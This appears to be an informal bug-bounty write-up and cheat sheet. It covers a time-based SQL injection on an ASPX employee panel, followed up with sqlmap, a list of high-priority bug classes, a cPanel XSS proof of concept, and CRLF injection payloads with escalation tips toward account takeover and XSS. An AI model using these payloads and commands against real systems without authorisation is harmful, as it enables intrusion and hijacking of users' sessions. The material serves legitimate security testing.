for who asking about write up
found employee panel running with aspx
all the time i try Sql in user parameter
1)
i used sleep payload
';WAITFOR DELAY '0:0:5'--
and the server get DELAY for 5 s
2)
save Post request in txt
sqlmap -r txt -p user --force-ssl --level 5 --risk 3

Top P1 to find :-
1) SQL Injection
2) IDOR
3) XSS
4) CSRF
5) Session Fixation
6) OAuth Misconfiguration
7) Missing Authentication
8) Session Hijacking
9) Secret Tokens / Secret Credentials leakage
10) Use of Default Credentials

Burp Suite Cheat SHeet

cPanel xss
PoC: /login?user=sth%22+onfocus=%22alert()%22+id=%22xss%22+%22%ff#xss

CRLF Tip:

Starting payloads:
/end/vuln/%0a%0d
/end/vuln/%0a
...etc.

Now escalate the impact:

1- ATO
If the web app vulnerable to Session Fixition, simply set a new cookie using the CRLF and send it to the Victim, then try to login with the injected cookies
2- Open redirect

Just add "Location:" header

3- XSS

- Add the "Location:" header with the value: "javascript: confirm(1)"

- Add the "Content-Length:" header this will make the response body read it at the end of response headers, then add your XSS payload